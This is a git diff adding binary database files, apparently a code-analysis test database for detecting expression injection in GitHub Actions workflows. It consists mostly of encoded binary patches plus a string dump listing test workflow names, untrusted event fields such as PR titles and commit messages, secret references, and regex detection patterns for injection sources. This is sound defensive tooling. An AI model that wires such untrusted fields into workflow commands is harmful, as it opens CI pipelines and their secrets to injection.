z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U zAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C7 z2oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N z0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+ z009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBly zK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF z5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk z1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs z0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZ zfB*pk1PBlyK!5-N0t5&UAV7cs0RjXF5FkK+009C72oNAZfB*pk1PBlyK!5-N0t5&U iAV7cs0RjXF5FkK+009C72oNAZfB=C7fl5x_H>VE`i2?Qi literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/pools/poolInfo b/db/db-yaml/default/pools/poolInfo new file mode 100644 index 0000000000000000000000000000000000000000..df3045a1ff5f4f01ad1cca4e97dbff096c69683a GIT binary patch literal 32 acmZQz00Sl<$;iOKv<5;$1SjTkivs`;zX8+$ literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/sourceLocationPrefix.rel b/db/db-yaml/default/sourceLocationPrefix.rel new file mode 100644 index 0000000000000000000000000000000000000000..fde1ac19d2b083530bcab4cb4fd2dcaa285234ab GIT binary patch literal 4 LcmZQzU|3lW!zSrk$os%~sBO;^f z^{@6k&ubQk4`)ww^AgAPyqQ!+<^t4j=p&ftQRe(WeMgO;zM;OCePGC`7&3WYZ|0@K zjc2DUIFYlPL*@o(Pl(sFq=Iuv?=r`oI?D5I6>pQ||))Un8v6}{Q ziTa!UC^%P`+x0=s|nS^WPXh)f|s{PvvYinJ__f)tVZyAiSh`i|v{jhpp zX&s{QWra2DEJJF^7{@$Jhu65Pyt(qVc;jD4h6RCzk%L&fh@c!~O5)_>Z9 z2)!FQFXH))N(|0VRvXE#03N9Je^7TS+8gF`zt$hXD(4A>Yd>I&CblS#VbU-s3%Ij& zKt>SVM`h0t+>f45@$T+srDa#x^##qJnS8{K5q5Jszp-jiUp z;#)y&0S}^ff%D=mN;jtloIU@-y)MH`(mxWP^~ARSs`iGcJAM~FtqNL-eo#D(L{Egi zOFZR7YpHV7x>ubcK9x{eJgBv!9hEQPwSJt2riYgbTLfUL9_zwloihypUfFP+&KL8eR${U`(ruD ze;MYXfW7``Tg7*O(fHv;QP;o~M88Y_PH;k%mmh8-^S^liQX!v$Ylz>_-%^*Dzobs6 z{bcZ;!WDuWNL{C1U_M3J(*&?y?O5LQaSmUIy#o%X{Tg?{yC3fydVO`@K5g>BAHzN5 z!#_;MGQ}rn&PAo+j_&Zkh*m<~rR=_NF6=5%lBm6B;nK-GP^e?IOaOPxz zFDf{iiT?ft-$(JUFmKZaAH3M%YO^!Z;nKsIvxWMaIwP~;5|~dc&mh^Wsoofy)ynvr zQvIlvEcA%Q(wQ)xcX>yz2yb{x_S-u-@!1=#c9)1=i~c0FmMS4!a(XKH%^lQ^$lf;5 zOv@u=W93T;H^Z94^!Sn!#^U{~JXyrJN^yR>=XpzRgpTS>em=uJL-iuBjCeOPXBON{ z?RS7r!91R7C-<)eUkG^1SlOK~o%M((BUzt2dBxdUO%;o{{h(o@WEFEVUFSOW#%v0^ zzM#34+LXAy%>O73BNl)xAZROJslC^s{5?Z z_U8e|oE@vRX0I!Co;v4~@qxpYWU&!hs~z6tWu}J8J-5M+;~8xPPL6>4qt(#wHsx)D zbWzF8MH>Xy75uZ(T=<3a#+?{mR$O6s!I`r%KP&#@;CNJH>L<#a8{GdG{c6+{`YDaJ zT&St?=2_C;hhISMRJHOC_>P(_{K^7)D%n?*7f;^TO_85~cdOs|k<#YFzo;}Ng}{R$ zQ_L_j273L;nJZZvoy?@nX{nUdV)gE(%=0L7;ws+E$Ao_moKUdg|L=KPvKpw&>k8Za zcD&~jwHacT=mnVw~P$Pva zOpim|Q63$?5N{^xl8_m|Ex;4#L1z>~9HqBaxSm?-3Vxn@2P<94UYUS5Sx-Aa`vA{L zYmz=!-7ydD9(x_A9pH8Jg47zy?>q|mJM{rnEjG9zY%AE3|ZHOL2 zzQdSK2(whOCgJa^^6Ww}xPo?2eGNDnyCew$v$0_g)}x1Yl&RP$9l4b^Pm8~mQnguAAGo3{N2qNz%? literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/strings/0/metadata/page-000000 b/db/db-yaml/default/strings/0/metadata/page-000000 new file mode 100644 index 0000000000000000000000000000000000000000..cb4291b6b3b65463c7b9660f099668c0cfc4fe35 GIT binary patch literal 16384 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 Bc#Z%7 literal 0 HcmV?d00001 diff --git a/db/db-yaml/default/strings/0/pageDump/page-000000000 b/db/db-yaml/default/strings/0/pageDump/page-000000000 new file mode 100644 index 00000000000..eec9231ab07 --- /dev/null +++ b/db/db-yaml/default/strings/0/pageDump/page-000000000 @@ -0,0 +1,2 @@ +tag:yaml.org,2002:(.*)mapstrboolseqintworkflow_call\$\{\{\s*[A-Za-z0-9_\[\]\*\(\)\.\-]+\s*\}\}octo-org/source-repo/.github/workflows/workflow.yml*output.workflow-outputFooahmadnassri/action-changed-filesoutput.filesPR changed filesoutput.jsondorny/paths-filteroutput.changesfranzdiebold/github-env-vars-actionoutput.CI_PR_DESCRIPTIONPR bodyoutput.CI_PR_TITLEPR titlejitterbit/get-changed-filesoutput.alloutput.addedoutput.modifiedoutput.removedoutput.renamedoutput.added_modifiedoutput.deletedkhan/pull-request-comment-triggeroutput.comment_bodypull_request_commenttj-actions/branch-namesoutput.current_branchPR current branchoutput.head_ref_branchPR head branchoutput.ref_branchBranch tirggering workflow runtj-actions/changed-filesoutput.added_filesoutput.copied_filesoutput.deleted_filesoutput.modified_filesoutput.renamed_filesoutput.all_old_new_renamed_filesoutput.type_changed_files${{ steps.changed-files.outputs.all_changed_files }}${{ secrets.DYNAMOBOTTOKEN }}${{ github.event.issue.url }}${{ github.actor }}${{ env.template }}${{ env.acceptable_missing_info }}${{ secrets.GITHUB_TOKEN }}${{env.comment_intro}}${{env.close_issue_comment}}${{env.info_needed}}${{env.issue_label}}${{env.needs_more_info_comment}}${{env.specific_info}}${{env.analysis_response}}${{env.greetings_comment}}${{ env.issue_json_string }}${{ github.repository }}${{github.event.after}}${{ env.ISSUE_BODY_PARSED }}${{env.user_name}}${{env.auto_branch}}${{env.destination_branch}}${{env.pr_message}}${{ github.event.discussion.title }}${{ github.event.discussion.body }}${{ github.event.pages[1].title }}${{ github.event.pages[11].title }}${{ github.event.pages[0].page_name }}${{ github.event.pages[2222].page_name }}${{ toJSON(github.event.pages.*.title) }}${{ steps.trim-url.outputs.trimmed_url }}${{needs.job1.outputs.job_output}}${{ env.global_env }}${{ env.test }}${{ env.job_env }}${{ env.step_env }}\$\{\{\s*([A-Za-z0-9_\[\]\*\((\)\.\-]+)\s*\}\}${{ matrix.language }}${{steps.no-step.outputs.foo}}github.event.comment.bodyinputs.who-to-greet${{ github.event.pull_request.title }}${{ github.event.pull_request.body }}${{ github.event.pull_request.head.label }}${{ github.event.pull_request.head.repo.default_branch }}${{ github.event.pull_request.head.repo.description }}${{ github.event.pull_request.head.repo.homepage }}${{ github.event.pull_request.head.ref }}${{ github.event.review.body }}output.unmerged_filesoutput.unknown_filesoutput.all_changed_and_modified_filesoutput.all_changed_filesoutput.other_changed_filesoutput.all_modified_filesoutput.other_modified_filesoutput.other_deleted_filesoutput.modified_keysoutput.changed_keystj-actions/verify-changed-filesoutput.changed-filestzkhan/pr-update-actionoutput.headMatchxt0rted/slash-command-actionoutput.command-arguments${{ github.head_ref }}${{ github.event.commits[11].message }}${{ github.event.commits[11].author.email }}${{ github.event.commits[11].author.name }}${{ github.event.head_commit.author.email }}${{ github.event.head_commit.author.name }}${{ github.event.head_commit.committer.email }}${{ github.event.head_commit.committer.name }}${{ github.event.commits[11].committer.email }}${{ github.event.commits[11].committer.name }}${{steps.summary.outputs.value}}${{steps.summary.outputs.foo}}${{ steps.source.outputs.all_changed_files_count }}${{ github.event.workflow_run.display_title }}${{ github.event.workflow_run.head_commit.message }}${{ github.event.workflow_run.head_commit.author.email }}${{ github.event.workflow_run.head_commit.author.name }}${{ github.event.workflow_run.head_commit.committer.email }}${{ github.event.workflow_run.head_commit.committer.name }}${{ github.event.workflow_run.head_branch }}${{ github.event.workflow_run.head_repository.description }}github.event.issue.titleenv.ISSUE_TITLEsteps.remove_quotations.outputs.replacedsteps.changed-files.outputs.all_changed_filesgithub.event.issue.bodyenv.content_analysis_responsesecrets.DYNAMOBOTTOKENgithub.event.issue.urlgithub.actorenv.ISSUE_BODYenv.templateenv.acceptable_missing_infosecrets.GITHUB_TOKENenv.comment_introenv.close_issue_commentenv.info_neededenv.issue_labelenv.needs_more_info_commentenv.specific_infoenv.analysis_responseenv.greetings_commentsteps.remove_quotes.outputs.replacedgithub.event.issue.numberenv.issue_json_stringsecrets.DYNAMO_ISSUES_TOKENgithub.repositorygithub.event.aftergithub.event.commits[0].messageenv.ISSUE_BODY_PARSEDenv.user_nameenv.auto_branchenv.destination_branchenv.pr_messagegithub.event.discussion.titlegithub.event.discussion.bodygithub.event.pages[1].titlegithub.event.pages[11].titlegithub.event.pages[0].page_namegithub.event.pages[2222].page_nametoJSON(github.event.pages.*.title)steps.extract-url.outputs.initial_urlsteps.curl.outputs.redirected_urlsteps.trim-url.outputs.trimmed_urlsteps.step.outputs.valuesteps.source.outputs.all_changed_filesalways()needs.job1.outputs.job_outputenv.global_envenv.testenv.job_envenv.step_envsteps.set-matrix.outputs.all_changed_filesfromJSON(needs.create-matrix.outputs.matrix)matrix.languagegithub.event.head_commit.messagesteps.no-step.outputs.foogithub.event.pull_request.titlegithub.event.pull_request.bodygithub.event.pull_request.head.labelgithub.event.pull_request.head.repo.default_branchgithub.event.pull_request.head.repo.descriptiongithub.event.pull_request.head.repo.homepagegithub.event.pull_request.head.refgithub.event.review.bodygithub.head_refgithub.event.commits[11].messagegithub.event.commits[11].author.emailgithub.event.commits[11].author.namegithub.event.head_commit.author.emailgithub.event.head_commit.author.namegithub.event.head_commit.committer.emailgithub.event.head_commit.committer.namegithub.event.commits[11].committer.emailgithub.event.commits[11].committer.namesteps.summary.outputs.valuesteps.summary.outputs.foosteps.source.outputs.all_changed_files_countsteps.step2.outputs.teststeps.step0.outputs.valuesteps.step1.outputs.MSGgithub.event.workflow_run.display_titlegithub.event.workflow_run.head_commit.messagegithub.event.workflow_run.head_commit.author.emailgithub.event.workflow_run.head_commit.author.namegithub.event.workflow_run.head_commit.committer.emailgithub.event.workflow_run.head_commit.committer.namegithub.event.workflow_run.head_branchgithub.event.workflow_run.head_repository.descriptionmerge.*/(([^/]*?)(?:\.([^.]*))?)argus_case_study.ymlargus_case_studyymlchanged-files.ymlcomment_issue.ymlcomment_issuecomment_issue_newline.ymlcomment_issue_newlinecross1.ymlcross1cross2.ymlcross2cross3.ymlcross3discussion.ymldiscussion_comment.ymlgollum.ymlimage_link_generator.ymlimage_link_generatorinter-job.ymlinter-jobissues.yamlyamlmatrix.ymlno-flow1.ymlno-flow1no-flow2.ymlno-flow2pull_request_review.ymlpull_request_review_comment.ymlpull_request_target.ymlpush.ymlsimple1.ymlsimple2.ymlsimple2test.ymlworkflow_run.ymlaction.ymlaction([^/]+)/([^/@]+)@(.+)v2frabertreplace-string-action1.2v4tj-actionsv40github-scriptv3actions-ecosystemaction-regex-matchv2.5setup-dotnetv1.2mad9000actions-find-and-replace-string3([^/]+)/([^/]+)/([^@]+)@(.+)actions/checkoutfrabert/replace-string-actionactions/github-scriptactions-ecosystem/action-regex-matchactions/setup-dotnetmad9000/actions-find-and-replace-string\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*commits\[[0-9]+\]\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*author\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*committer\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*head_commit\s*\.\s*message\b\bgithub\s*\.\s*head_ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*body\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*title\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*ref\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*label\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*homepage\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*pull_request\s*\.\s*head\s*\.\s*repo\s*\.\s*default_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_branch\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*display_title\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*message\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_repository\b\s*\.\s*description\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*author\b\s*\.\s*email\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*name\b\bgithub\s*\.\s*event\s*\.\s*workflow_run\s*\.\s*head_commit\b\s*\.\s*committer\b\s*\.\s*email\bexit name: Issue Workflowexit name: CIexit on: issue_commentexit name: I ... edicterexit name: Cherry pickingexit on: discussionexit on: dis ... commentexit on: gollumexit name: I ... cessingexit on: pushexit on: issuesexit name: " ... nguage"exit on: pul ... _reviewexit on: pul ... commentexit on: pul ... _targetexit on:exit name: 'test'exit name: 'Hello World'enter name: Issue Workflowenter name: CIenter on: issue_commententer name: I ... edicterenter name: Cherry pickingenter on: discussionenter on: dis ... commententer on: gollumenter name: I ... cessingenter on: pushenter on: issuesenter name: " ... nguage"enter on: pul ... _reviewenter on: pul ... commententer on: pul ... _targetenter on:enter name: 'test'enter name: 'Hello World'exit name: Issue Workflow (normal)exit name: CI (normal)exit on: issue_comment (normal)exit name: I ... edicter (normal)exit name: Cherry picking (normal)exit on: discussion (normal)exit on: dis ... comment (normal)exit on: gollum (normal)exit name: I ... cessing (normal)exit on: push (normal)exit on: issues (normal)exit name: " ... nguage" (normal)exit on: pul ... _review (normal)exit on: pul ... comment (normal)exit on: pul ... _target (normal)exit on: (normal)exit name: 'test' (normal)exit name: 'Hello World' (normal)input testocto-org/sink-repo/.github/workflows/workflow.ymlinput.config-pathexpression-injectionconfig-path.github/workflows/argus_case_study.yml.github/workflows.github.github/workflows/changed-files.yml.github/workflows/comment_issue.yml.github/workflows/comment_issue_newline.yml.github/workflows/cross1.yml.github/workflows/cross2.yml.github/workflows/cross3.yml.github/workflows/discussion.yml.github/workflows/discussion_comment.yml.github/workflows/gollum.yml.github/workflows/image_link_generator.yml.github/workflows/inter-job.yml.github/workflows/issues.yaml.github/workflows/matrix.yml.github/workflows/no-flow1.yml.github/workflows/no-flow2.yml.github/workflows/pull_request_review.yml.github/workflows/pull_request_review_comment.yml.github/workflows/pull_request_target.yml.github/workflows/push.yml.github/workflows/simple1.yml.github/workflows/simple2.yml.github/workflows/test.yml.